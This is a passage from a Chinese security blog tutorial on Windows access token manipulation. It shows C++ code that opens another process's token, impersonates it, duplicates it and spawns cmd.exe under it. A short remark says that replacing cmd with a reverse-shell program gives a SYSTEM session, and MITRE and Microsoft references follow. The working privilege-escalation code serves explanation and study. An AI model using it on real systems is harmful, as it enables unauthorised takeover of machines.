OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &amp;tokenHandle);</span><br><span class="line">	<span class="keyword">if</span> (GetLastError() == <span class="literal">NULL</span>)</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] OpenProcessToken() success!\n"</span>);</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] OpenProcessToken() Return Code: %i\n"</span>, getToken);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] OpenProcessToken() Error: %i\n"</span>, GetLastError());</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);</span><br><span class="line">	<span class="keyword">if</span> (GetLastError() == <span class="literal">NULL</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] ImpersonatedLoggedOnUser() success!\n"</span>);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] Current user is: %s\n"</span>, (get_username()).c_str());</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] Reverting thread to original user context\n"</span>);</span><br><span class="line">		RevertToSelf();</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] ImpersonatedLoggedOnUser() Return Code: %i\n"</span>, getToken);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] ImpersonatedLoggedOnUser() Error: %i\n"</span>, GetLastError());</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	BOOL duplicateToken = DuplicateTokenEx(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, <span class="literal">NULL</span>, SecurityImpersonation, TokenPrimary, &amp;duplicateTokenHandle);</span><br><span class="line">	<span class="keyword">if</span> (GetLastError() == <span class="literal">NULL</span>)</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] DuplicateTokenEx() success!\n"</span>);</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] DuplicateTokenEx() Return Code: %i\n"</span>, duplicateToken);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] DupicateTokenEx() Error: %i\n"</span>, GetLastError());</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	</span><br><span class="line">	BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, <span class="string">L"C:\\Windows\\System32\\cmd.exe"</span>, <span class="literal">NULL</span>, <span class="number">0</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, &amp;startupInfo, &amp;processInformation);</span><br><span class="line">	<span class="keyword">if</span> (GetLastError() == <span class="literal">NULL</span>)</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] Process spawned!\n"</span>);</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] CreateProcessWithTokenW Return Code: %i\n"</span>, createProcess);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] CreateProcessWithTokenW Error: %i\n"</span>, GetLastError());</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此时，我们便可以获取任意进程的token：</p>
<p><img src="../images/token/8.png" alt="image"></p>
<p>将启动cmd更改为我们的反弹shell程序，即可获取的一个system的session：</p>
<p><img src="../images/token/9.png" alt="image"></p>
<p><img src="../images/token/10.png" alt="image"></p>
<p>参考文章：</p>
<p><a href="https://attack.mitre.org/techniques/T1134/" target="_blank" rel="noopener">https://attack.mitre.org/techniques/T1134/</a></p>
<p><a href="https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw</a></p>
<p><a href="https://docs.microsoft.com/zh-cn/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetokenex?redirectedfrom=MSDN" target="_blank" rel="noopener">https://docs.microsoft.com/zh-cn/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetokenex?redirectedfrom=MSDN</a></p>
<p><a href="https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights</a></p>
<p><a href="https://www.secpulse.com/archives/94848.html" target="_blank" rel="noopener">https://www.secpulse.com/archives/94848.html</a></p>
<p><a href="https://www.slideshare.net/JustinBui5/understanding-windows-access-token-manipulation" target="_blank" rel="noopener">https://www.slideshare.net/JustinBui5/understanding-windows-access-token-manipulation</a></p>
<p><a href="https://www.lshack.cn/721/" target="_blank" rel="noopener">https://www.lshack.cn/721/</a></p>

      
    </div>

    

    
    
    

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/token/">Windows Access Token Manipulation　Attack</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 冷逸 的个人博客">冷逸</a></p>
  <p><span>发布时间:</span>2020年03月27日 - 18:03</p>
  <p><span>最后更新:</span>2020年03月27日 - 19:03</p>
  <p><span>原始链接:</span><a href="/token/" title="Windows Access Token Manipulation　Attack">https://lengjibo.github.io/token/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://lengjibo.github.io/token/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
    });
    });  
</script>


      
    </div>
    <div>
      
        <div>
    
        <div style="text-align:center;color: #555;font-size:14px;">-------------The End-------------</div>
    
</div>

      
    </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat.png" alt="冷逸 WeChat Pay"/>
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/zhifubao.jpg" alt="冷逸 Alipay"/>
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
        <div class="post-widgets">
        

        

        
          
          <div class="social_share">
            
               <div>
                 
  <div class="bdsharebuttonbox">
    <a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
    <a href="#" class="bds_douban" data-cmd="douban" title="分享到豆瓣网"></a>
    <a href="#" class="bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
    <a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a>
    <a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信"></a>
    <a href="#" class="bds_tieba" data-cmd="tieba" title="分享到百度贴吧"></a>
    <a href="#" class="bds_twi" data-cmd="twi" title="分享到Twitter"></a>
    <a href="#" class="bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
    <a href="#" class="bds_more" data-cmd="more"></a>
    <a class="bds_count" data-cmd="count"></a>
  </div>
  <script>
    window._bd_share_config = {
      "common": {
        "bdText": "",
        "bdMini": "2",
        "bdMiniList": false,
        "bdPic": ""
      },
      "share": {
        "bdSize": "16",
        "bdStyle": "0"
      },
      "image": {
        "viewList": ["tsina", "douban", "sqq", "qzone", "weixin", "twi", "fbook"],
        "viewText": "分享到：",
        "viewSize": "16"
      }
    }
  </script>

<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

               </div>
            
            
          </div>
        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/lassdump/" rel="next" title="绕过杀软转存lsass进程">
                <i class="fa fa-chevron-left"></i> 绕过杀软转存lsass进程
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/mysqludf/" rel="prev" title="小议Mysql提权">
                小议Mysql提权 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="http://ww1.sinaimg.cn/large/007F8GgBly1g7vony4ltaj308w08wq30.jpg"
                alt="冷逸" />
            
              <p class="site-author-name" itemprop="name">冷逸</p>
              <p class="site-description motion-element" itemprop="description">做一个温柔的人...</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">113</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">Kategorien</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">120</span>
                    <span class="site-state-item-name">Tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/../../.deploy_git/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/lengjibo" target="_blank" title="GitHub"><i class="fa fa-fw fa-globe"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="qqlengyi@163.com" target="_blank" title="E-Mail"><i class="fa fa-fw fa-globe"></i>E-Mail</a>
                  
                </span>
              
            </div>
          
        <div id="music163player">
            <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=110 src="https://music.163.com/outchain/player?type=0&id=377079922&auto=1&height=90"></iframe>
          </div>
          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sqlmap.wiki/" title="青春's blog" target="_blank">青春's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.addon.pub/" title="Yokeen's blog" target="_blank">Yokeen's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://freeerror.org/" title="之乎者也's blog" target="_blank">之乎者也's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.bugbank.cn/team/FrigidSword" title="漏洞银行" target="_blank">漏洞银行</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.vulbox.com/team/Frigid%20Sword%E5%AE%89%E5%85%A8%E5%9B%A2%E9%98%9F" title="漏洞盒子" target="_blank">漏洞盒子</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://godpang.github.io/" title="Mr.赵" target="_blank">Mr.赵</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://amliaw4.github.io/" title="amliaW4'S Blog" target="_blank">amliaW4'S Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.se7ensec.cn/" title="se7en's Blog" target="_blank">se7en's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ninjia.gitbook.io/secskill/" title="secskill" target="_blank">secskill</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.bug1024.cn/" title="ibug" target="_blank">ibug</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://wwcx.org/" title="Strjziny's Blog" target="_blank">Strjziny's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是Windows-Access-Token"><span class="nav-number">1.</span> <span class="nav-text">什么是Windows Access Token</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Windows-Access-Token组成"><span class="nav-number">1.1.</span> <span class="nav-text">Windows Access Token组成</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SID"><span class="nav-number">1.2.</span> <span class="nav-text">SID</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Windows-Access-Token产生过程"><span class="nav-number">1.3.</span> <span class="nav-text">Windows Access Token产生过程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cobalt-strike模拟令牌"><span class="nav-number">2.</span> <span class="nav-text">cobalt strike模拟令牌</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#metasploit模拟令牌"><span class="nav-number">3.</span> <span class="nav-text">metasploit模拟令牌</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Invoke-TokenManipulation模拟令牌"><span class="nav-number">4.</span> <span class="nav-text">Invoke-TokenManipulation模拟令牌</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#令牌模拟的细节"><span class="nav-number">5.</span> <span class="nav-text">令牌模拟的细节</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2014 – <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">冷逸</span>

  

  
</div>




  <div class="powered-by">Erstellt mit  <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Muse</a> v6.4.0</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="Total Visitors">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="Total Views">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  







  
  







  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/jquery/2.1.3/jquery.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.ui.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.1/canvas-nest.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/canvas_sphere.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.0"></script>



  



  










  





  

  

  

  

  
  

  

  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/src/love.js"></script>
